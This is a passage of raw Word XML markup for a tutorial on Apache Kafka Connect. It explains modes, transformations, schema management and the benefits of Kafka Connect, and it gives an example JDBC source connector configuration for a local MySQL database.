          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Suitable for simple, low-volume data transfer tasks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0583871C" w14:textId="77777777" w:rsidR="00D57CED" w:rsidRPr="0003272F" w:rsidRDefault="00D57CED" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="143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istributed Mode</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Suitable for large-scale, high-availability setups where multiple instances of connectors can be run across several machines.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E2F658" w14:textId="77777777" w:rsidR="00D57CED" w:rsidRPr="0003272F" w:rsidRDefault="00D57CED" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="143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nector Configurations</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B115826" w14:textId="77777777" w:rsidR="00D57CED" w:rsidRPr="0003272F" w:rsidRDefault="00D57CED" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="143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lastRenderedPageBreak/>
        <w:t>Kafka Connect uses configuration files to define how connectors operate, including things like Kafka topic names, connector-specific options (e.g., batch size), and external system-specific settings (e.g., database connection details).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="036F7CE7" w14:textId="77777777" w:rsidR="00D57CED" w:rsidRPr="0003272F" w:rsidRDefault="00D57CED" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="143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ese configurations can be loaded into Kafka Connect via REST API calls or configuration files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67176E40" w14:textId="77777777" w:rsidR="00D57CED" w:rsidRPr="0003272F" w:rsidRDefault="00D57CED"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How Kafka Connect Helps in Data Integration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08ED8045" w14:textId="77777777" w:rsidR="00D57CED" w:rsidRPr="0003272F" w:rsidRDefault="00D57CED" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="143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treamlining Data Movement</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A5E8394" w14:textId="77777777" w:rsidR="00D57CED" w:rsidRPr="0003272F" w:rsidRDefault="00D57CED" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="143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Connect abstracts the complexities of manually handling Kafka producers and consumers when integrating with external systems. It provides connectors for common systems such as databases, cloud services, file systems, etc., enabling </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>plug-and-play</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> integration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36EA7432" w14:textId="77777777" w:rsidR="00D57CED" w:rsidRPr="0003272F" w:rsidRDefault="00D57CED" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="143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calable and Fault Tolerant</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B787B2D" w14:textId="77777777" w:rsidR="00D57CED" w:rsidRPr="0003272F" w:rsidRDefault="00D57CED" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="143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Connect is designed to handle large-scale data transfers in a distributed environment. It allows the system to scale horizontally by adding more workers, which ensures fault tolerance and high availability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381A6575" w14:textId="77777777" w:rsidR="00D57CED" w:rsidRPr="0003272F" w:rsidRDefault="00D57CED" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="143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ata Transformation</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B319DC" w14:textId="77777777" w:rsidR="00D57CED" w:rsidRPr="0003272F" w:rsidRDefault="00D57CED" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="143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Connect allows the use of </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Single Message Transformations (SMTs)</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, which enable lightweight transformations of messages before they are sent to Kafka topics or external systems. These transformations allow data cleansing or format changes (e.g., masking sensitive data) before storage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF3FD63" w14:textId="77777777" w:rsidR="00D57CED" w:rsidRPr="0003272F" w:rsidRDefault="00D57CED" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="143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chema Management</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174CB175" w14:textId="77777777" w:rsidR="00D57CED" w:rsidRPr="0003272F" w:rsidRDefault="00D57CED" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="143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Connect works closely with </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kafka Schema Registry</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, allowing you to manage and enforce schemas when importing and exporting data to/from Kafka topics. This provides </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>data consistency</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validation</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74409DF5" w14:textId="77777777" w:rsidR="00D57CED" w:rsidRPr="0003272F" w:rsidRDefault="00D57CED" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="143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imple Integration with External Systems</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF8B2A4" w14:textId="77777777" w:rsidR="00D57CED" w:rsidRPr="0003272F" w:rsidRDefault="00D57CED" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="143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Connect comes with built-in connectors for many popular systems, including:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78EA3A7B" w14:textId="77777777" w:rsidR="00D57CED" w:rsidRPr="0003272F" w:rsidRDefault="00D57CED" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="143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atabases</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., PostgreSQL, MySQL, Oracle) through JDBC source and sink connectors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD27918" w14:textId="77777777" w:rsidR="00D57CED" w:rsidRPr="0003272F" w:rsidRDefault="00D57CED" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="143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loud storage</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., Amazon S3, Google Cloud Storage) through S3 sink connectors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417C63A9" w14:textId="77777777" w:rsidR="00D57CED" w:rsidRPr="0003272F" w:rsidRDefault="00D57CED" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="143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ata lakes</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>NoSQL systems</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., HDFS, MongoDB) via dedicated connectors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C083158" w14:textId="77777777" w:rsidR="00D57CED" w:rsidRPr="0003272F" w:rsidRDefault="00D57CED" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="143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File systems</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., reading files from local file systems or cloud storage).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4159ECD6" w14:textId="77777777" w:rsidR="00D57CED" w:rsidRPr="0003272F" w:rsidRDefault="00D57CED" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="143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atch and Streaming Data Integration</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31DFAEDA" w14:textId="77777777" w:rsidR="00D57CED" w:rsidRPr="0003272F" w:rsidRDefault="00D57CED" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="143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Connect can handle both </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>batch</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streaming</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> data flows. Source connectors can ingest batch data from databases, while sink connectors can stream the data into external systems like data warehouses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D43A441" w14:textId="77777777" w:rsidR="00D57CED" w:rsidRPr="0003272F" w:rsidRDefault="00D57CED"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ey Benefits of Kafka Connect:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57014141" w14:textId="77777777" w:rsidR="00D57CED" w:rsidRPr="0003272F" w:rsidRDefault="00D57CED" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="143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implified Data Pipelines</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66314D54" w14:textId="77777777" w:rsidR="00D57CED" w:rsidRPr="0003272F" w:rsidRDefault="00D57CED" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="143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Connect provides an easy way to create and manage data pipelines between Kafka and external systems. It reduces the need for custom consumer-producer implementations, offering a more streamlined solution for integrating systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C706CE1" w14:textId="77777777" w:rsidR="00D57CED" w:rsidRPr="0003272F" w:rsidRDefault="00D57CED" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="143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calability and High Availability</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="500DB3A7" w14:textId="77777777" w:rsidR="00D57CED" w:rsidRPr="0003272F" w:rsidRDefault="00D57CED" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="143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Connect can scale horizontally, and it is fault-tolerant. In a distributed environment, Kafka Connect ensures that the connectors can handle large-scale data ingestion and export without service interruptions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B1E52F" w14:textId="77777777" w:rsidR="00D57CED" w:rsidRPr="0003272F" w:rsidRDefault="00D57CED" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="143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Extensibility</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB21BE9" w14:textId="77777777" w:rsidR="00D57CED" w:rsidRPr="0003272F" w:rsidRDefault="00D57CED" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="143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Connect is highly extensible. It allows for the development of custom connectors, either for source or sink integrations. This makes it easy to integrate Kafka with almost any external system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE57956" w14:textId="77777777" w:rsidR="00D57CED" w:rsidRPr="0003272F" w:rsidRDefault="00D57CED" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="143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duced Operational Overhead</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="706C9ADA" w14:textId="77777777" w:rsidR="00D57CED" w:rsidRPr="0003272F" w:rsidRDefault="00D57CED" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="143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By using Kafka Connect, you avoid the complexities of manually writing integration code. Kafka Connect takes care of many operational tasks, such as managing offsets, tracking data ingestion status, and handling errors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117D8965" w14:textId="77777777" w:rsidR="00D57CED" w:rsidRPr="0003272F" w:rsidRDefault="00D57CED" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="143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entralized Configuration and Management</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="180CA642" w14:textId="77777777" w:rsidR="00D57CED" w:rsidRPr="0003272F" w:rsidRDefault="00D57CED" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="143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Connect provides REST APIs for managing connector configurations, which allows easy integration with external monitoring, configuration management, and automation systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3852FF27" w14:textId="77777777" w:rsidR="00D57CED" w:rsidRPr="0003272F" w:rsidRDefault="00D57CED" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="143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ata Transformation</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63135874" w14:textId="77777777" w:rsidR="00D57CED" w:rsidRPr="0003272F" w:rsidRDefault="00D57CED" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="143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Connect supports </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>message transformations</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> as part of the ingestion/export pipeline. These transformations can modify the data (e.g., removing sensitive data, formatting changes) before sending it to Kafka topics or external systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78353972" w14:textId="77777777" w:rsidR="00D57CED" w:rsidRPr="0003272F" w:rsidRDefault="00D57CED"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Example: Kafka Connect JDBC Source Connector</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE9CC6B"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lastRenderedPageBreak/>
        <w:t>Let’s consider a scenario where we want to stream data from a MySQL database into a Kafka topic. Here is how we can configure the Kafka Connect JDBC Source Connector:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2053DE0B" w14:textId="77777777" w:rsidR="00D57CED" w:rsidRPr="0003272F" w:rsidRDefault="00D57CED" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="143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nstall Kafka Connect JDBC Connector</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7A162D" w14:textId="77777777" w:rsidR="00D57CED" w:rsidRPr="0003272F" w:rsidRDefault="00D57CED" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="143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First, ensure that the Kafka Connect JDBC Connector is installed. It is available as part of the </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Confluent Hub</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or can be manually downloaded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B18F72" w14:textId="77777777" w:rsidR="00D57CED" w:rsidRPr="0003272F" w:rsidRDefault="00D57CED" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="143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figure the Source Connector</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D8CCBF"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t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4833AE67"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name": "mysql-source-connector",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B68F4C"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fig": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A3FCF9"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nector.class": "io.confluent.connect.jdbc.JdbcSourceConnector",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="552CB64C"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tasks.max": "1",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F5A6A49"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nection.url": "jdbc:mysql://localhost:3306/mydb",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AAC42D8"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nection.user": "username",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8D2784"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nection.password": "password",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B31E4FF"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mode": "incrementing",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="342ACFCC"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incrementing.column.name": "id",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697291AF"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topic.prefix": "mysql-",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4BD8D6"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poll.interval.ms": "1000"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57CA8A05"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101DBA76"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t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F86EFC5" w14:textId="77777777" w:rsidR="00D57CED" w:rsidRPr="0003272F" w:rsidRDefault="00D57CED" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="143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nector.class</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Defines the connector to be used (in this case, JdbcSourceConnector).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A94D87" w14:textId="77777777" w:rsidR="00D57CED" w:rsidRPr="0003272F" w:rsidRDefault="00D57CED" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="143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nection.url</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The JDBC URL to connect to the MySQL database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381022A3" w14:textId="77777777" w:rsidR="00D57CED" w:rsidRPr="0003272F" w:rsidRDefault="00D57CED" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
